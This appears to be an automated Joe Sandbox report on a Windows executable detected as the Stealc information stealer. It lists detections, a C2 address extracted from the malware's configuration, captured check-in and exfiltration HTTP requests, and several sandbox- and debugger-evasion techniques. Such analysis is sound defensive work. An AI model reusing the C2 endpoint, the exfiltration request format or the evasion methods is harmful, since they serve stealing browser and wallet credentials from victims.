Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1521649
MD5:4d54b2279d2b7ca76fdaf6d89c509355
SHA1:379684bc91685997bfe8fba6a15212f925c7cafe
SHA256:65055a6af994e27432e1bb9ced6fcb0886680b9f5a1a715d32d98341203cb7cc
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4D54B2279D2B7CA76FDAF6D89C509355)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6672JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6672JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.a70000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-29T01:36:06.027240+020020442431Malware Command and Control Activity Detected192.168.2.749699185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.a70000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00A7C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A79AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00A79AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A77240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00A77240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A79B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00A79B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A88EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00A88EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A84910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A84910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A7DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A7E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A7ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A84570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A84570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A83EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A83EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A7F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A7DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A7BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 30 35 39 30 36 42 45 30 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 2d 2d 0d 0a Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="hwid"8E05906BE0482604982160------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="build"save------JJJJDAAECGHDGDGCGHDB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A76280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00A76280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 30 35 39 30 36 42 45 30 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 2d 2d 0d 0a Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="hwid"8E05906BE0482604982160------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="build"save------JJJJDAAECGHDGDGCGHDB--
                Source: file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1297365011.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1297365011.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&f&f
                Source: file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpVe
                Source: file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpfeV
                Source: file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/t
                Source: file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37w

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC58810_2_00EC5881
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E408950_2_00E40895
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4589D0_2_00E4589D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E490090_2_00E49009
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD79A50_2_00DD79A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B34D0_2_00D0B34D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3D4C60_2_00E3D4C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9AC800_2_00D9AC80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4F4BD0_2_00D4F4BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4748A0_2_00E4748A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D80C5F0_2_00D80C5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E32C3E0_2_00E32C3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAC5980_2_00DAC598
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D38DA20_2_00D38DA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3AD7B0_2_00E3AD7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E43ED70_2_00E43ED7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3B7CA0_2_00E3B7CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BF5E0_2_00D3BF5E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A745C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: spyqlfjc ZLIB complexity 0.9948946083080424
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A88680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00A88680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A83720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00A83720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\85FG4Z8A.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1843712 > 1048576
                Source: file.exeStatic PE information: Raw size of spyqlfjc is bigger than: 0x100000 < 0x19be00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.a70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;spyqlfjc:EW;scxfhudm:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A89860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cb7f9 should be: 0x1d1f25
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: spyqlfjc
                Source: file.exeStatic PE information: section name: scxfhudm
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB18A5 push 7554E71Dh; mov dword ptr [esp], ebp0_2_00EB18D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E73085 push 48E573A7h; mov dword ptr [esp], eax0_2_00E730D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA6888 push esi; mov dword ptr [esp], 7FA46EEFh0_2_00EA68F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC5881 push ecx; mov dword ptr [esp], ebp0_2_00EC5886
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC5881 push ebx; mov dword ptr [esp], 4653060Eh0_2_00EC5937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC5881 push 5B2DA72Ch; mov dword ptr [esp], ecx0_2_00EC59F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 123E554Eh; mov dword ptr [esp], ebp0_2_00E408AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 69519E96h; mov dword ptr [esp], ecx0_2_00E408ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 015A37A8h; mov dword ptr [esp], edx0_2_00E40930
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 587C0597h; mov dword ptr [esp], ebp0_2_00E4095F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push ebx; mov dword ptr [esp], 52604D79h0_2_00E409EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push ecx; mov dword ptr [esp], ebx0_2_00E40A09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push eax; mov dword ptr [esp], esp0_2_00E40A34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 348F6A11h; mov dword ptr [esp], edi0_2_00E40A5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push edi; mov dword ptr [esp], esi0_2_00E40A63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push esi; mov dword ptr [esp], 70FBD093h0_2_00E40A67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 1A7E5EB3h; mov dword ptr [esp], ebx0_2_00E40AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push ebx; mov dword ptr [esp], 06924D9Ah0_2_00E40AF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 2F289914h; mov dword ptr [esp], eax0_2_00E40B87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push ecx; mov dword ptr [esp], 7AFE97C0h0_2_00E40BD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 631FD63Fh; mov dword ptr [esp], edi0_2_00E40BE4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push esi; mov dword ptr [esp], 5FAFD5F1h0_2_00E40C0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push eax; mov dword ptr [esp], esi0_2_00E40CE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 73CA8B03h; mov dword ptr [esp], edi0_2_00E40CF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push ecx; mov dword ptr [esp], eax0_2_00E40D16
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push 21564260h; mov dword ptr [esp], ebx0_2_00E40D1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push eax; mov dword ptr [esp], esp0_2_00E40DE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push eax; mov dword ptr [esp], 6BFFA4E3h0_2_00E40F0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push ebx; mov dword ptr [esp], edx0_2_00E40FCD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push eax; mov dword ptr [esp], edi0_2_00E41055
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E40895 push eax; mov dword ptr [esp], ebp0_2_00E41074
                Source: file.exeStatic PE information: section name: spyqlfjc entropy: 7.9536919163300555

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A89860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13600
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1748 second address: CD174C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD174C second address: CD1768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21112h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DFC8 second address: E4DFDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5408F96886h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F5408F96886h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E453DE second address: E453E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E453E2 second address: E45418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5408F96895h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5408F96890h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D0DB second address: E4D0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D62D second address: E4D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D631 second address: E4D64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21117h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D81D second address: E4D84C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96891h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5408F9688Dh 0x0000000e jmp 00007F5408F9688Dh 0x00000013 rdtsc
